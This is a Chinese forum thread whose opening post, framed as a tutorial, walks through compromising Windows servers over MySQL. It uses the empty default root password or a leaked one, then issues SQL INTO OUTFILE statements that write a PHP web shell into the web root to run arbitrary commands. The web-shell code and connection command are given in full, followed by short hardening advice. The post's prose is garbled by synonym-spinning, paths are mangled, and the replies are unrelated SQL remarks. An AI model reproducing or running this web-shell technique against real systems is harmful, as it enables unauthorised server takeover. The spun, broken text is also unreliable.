仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 754|回复: 7
打印 上一主题 下一主题

[学习教程] 绝无经由的经由过程mysql进侵NT和win2000

[复制链接]
山那边是海 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 20:12:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
通过支付一定费用,客户可以得到优先的24/7支持,访问内容丰富的在线知识库和联系一个专门的技术负责经理。很多NT和win2000呆板下面装有MySQL和php。而mysql默许数据库root账号为空,这就给进侵者一个路子来进侵该呆板。假如修正了数据库root的账号暗码,而IIS的一些其他毛病招致源代码泄露也大概看到数据库的账号和暗码。假定我们已拿到了数据库的暗码,看看我们怎样经由过程mysql数据库来取得该呆板的必定权限。
起首一般情形下,一样平常mysql和php共同利用,年夜多半NT和win2000的呆板上假如利用php一样平常城市利用mysql。而默许情形下windows上的mysql是同意远程毗连的。而装在linux等上的mysql是不同意远程毗连的。进侵的思绪是写一个shell剧本到web目次。就能够经由过程这个shell教原本实行命令了。而一样平常情形下,windows的web服务器是IIS,默许也是撑持asp剧本的。网上也到处可见asp的sehll剧本,只需将这个asp的剧本传到web目次就行了。可是我以为那些剧本都对照贫苦。而假如方针呆板下面有php的话就能够用php剧本了。在这里我用php剧本来写shell。起首我们要用mysql的客户端保持到该呆板,并实行我们的sql语句来在web目次天生php的shell剧本。
C:mysqlin>mysql-hxxx.xxx.xxx.xxx-uroot<php.sql

C:mysqlin>

上面是php.sql的内容:
usetest;
createtabletmp(cmdTEXT);
insertintotmpvalues(<bodyonload=document.form1.cmd.focus()><?if(isset($cmd)){$cmd=stripslashes($cmd);exec("$cmd>temp.dat");}?><styletype="text/CSS"><!--.form1{BACKGROUND:#FFFFFF;BORDER-BOTTOM:#6666661pxsolid;BORDER-LEFT:#6666661pxsolid;BORDER-RIGHT:#6666661pxsolid;BORDER-TOP:#6666661pxsolid;COLOR:#3c464f;FONT-SIZE:9pt;clip:rect();cursor:text;height:auto;width:auto;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px--></style><pclass="title2"></p><formname="form1"method="post"action="/cmd2.php"><inputtype="text"name="cmd"size="50"class="form1"></form><formname="form2"method="post"action=""><p><textareaname="text"cols="120"rows="50"class="form1"><?if(isset($cmd)){readfile("temp.dat");unlink("temp.dat");}?></textarea></p></form></body>);
select*fromtmpintooutfiled:
ewcmd2.php;
droptabletmp;

下面的sql语句是创立一个名字为tmp的table,将剧本输出到数据库,然后再将这个剧本保留成d:
ewcmd2.php。然后删除tmp这个我们创立的table。这里的d:
ew的目次是该呆板的web目次。然后我们就能够在扫瞄器中输http://xxx.xxx.xxx.xxx/cmd2.php,就能够使用这个shell实行命令了。至此我们已取得了该网站的一个guest权限的shell了。我们能够经由过程这个shell剧本写个ftp剧本来上传文件,也能够使用这个shell来举行其他guest权限可以实行的一些东东了。这里必要注重的是假如cmd2.php已存在了这个sql剧本是不克不及运转乐成的。这个php剧本不克不及写乐成。
关头的成绩在于取得数据库的暗码而且可以找到web目次。然后统统都不成成绩了。
平安倡议:设置mysql数据库的暗码,而且要有必定的强度。设置好IIS制止泄露源代码,不要间接在web目次编纂剧本等文件,由于有些编纂器会主动发生一个备份文件,通常是.bak的扩大名,如许歹意打击者便可能间接翻开这个.bak文件从而泄露源代码,好比global.asa.bak。

MySQL在业界的流行所带来的另一个好处是,人们总可以很轻松地发现本行业的MySQL学习教程。厂商都希望他们的开发工具和应用程序框架可以与MySQL数据库兼容。
小魔女 该用户已被删除
沙发
发表于 2015-1-18 18:43:56 | 只看该作者
多走走一此相关论坛,多看一些实例开发,多交流0经验,没什么的,我也是刚学没多久!加油
飘灵儿 该用户已被删除
板凳
发表于 2015-1-26 05:28:32 | 只看该作者
XML字段类型更好的解决了XML数据的操作。XQuery确实不错,但是个人对其没好感。(CSDN的开发者应该是相当的熟了!)
再见西城 该用户已被删除
地板
发表于 2015-2-4 13:53:48 | 只看该作者
原来的计算字段其实和虚拟字段很像。只是管理方面好了而已,性能方面提高不多。但是SQL2005提供了计算字段的持久化,这就提高了查询的性能,但是会加重insert和update的负担。OLTP慎用。OLAP可以大规模使用。
老尸 该用户已被删除
5#
发表于 2015-2-10 01:23:37 | 只看该作者
每天坚持做不一样的是,认真做笔录,定时复习。一个月你就可以有一定的收获。当然如果你想在sql方面有一定的造诣,你少不了需要看很多很多的书籍了。
透明 该用户已被删除
6#
发表于 2015-2-28 14:39:01 | 只看该作者
这就引发了对varchar和char效率讨论的老问题。到底如何分配varchar的数据,是否会出现大规模的碎片?
小妖女 该用户已被删除
7#
发表于 2015-3-10 00:25:58 | 只看该作者
个人感觉没有case直观。而且默认的第三字段(还可能更多)作为groupby字段很容易造成新手的错误。
爱飞 该用户已被删除
8#
发表于 2015-3-17 04:05:14 | 只看该作者
where子句的作用是在对查询结果进行分组前,将不符合where条件的行去掉,即在分组之前过滤数据,条件中不能包含聚组函数,使用where条件显示特定的行。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-11-15 14:04

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表